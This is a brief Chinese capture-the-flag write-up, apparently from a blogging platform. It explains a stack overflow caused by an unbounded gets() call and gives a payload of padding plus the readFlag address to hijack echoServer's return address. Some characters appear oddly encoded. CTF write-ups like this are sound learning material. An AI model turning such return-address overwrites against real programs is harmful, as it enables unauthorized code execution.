Vb0p6naFSM

1.丟進(jìn)IDA分析


發(fā)現(xiàn)gets函數(shù)沒有作長(zhǎng)度限制,存在明顯的棧溢出

2.發(fā)現(xiàn)程序中存在可用于讀flag的函數(shù)



其地址為0x4444667D

3.覆蓋echoServer函數(shù)的返回地址為readFlag函數(shù)即可

payload = "A"*24 + "\x7d\x66\x44\x44"
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容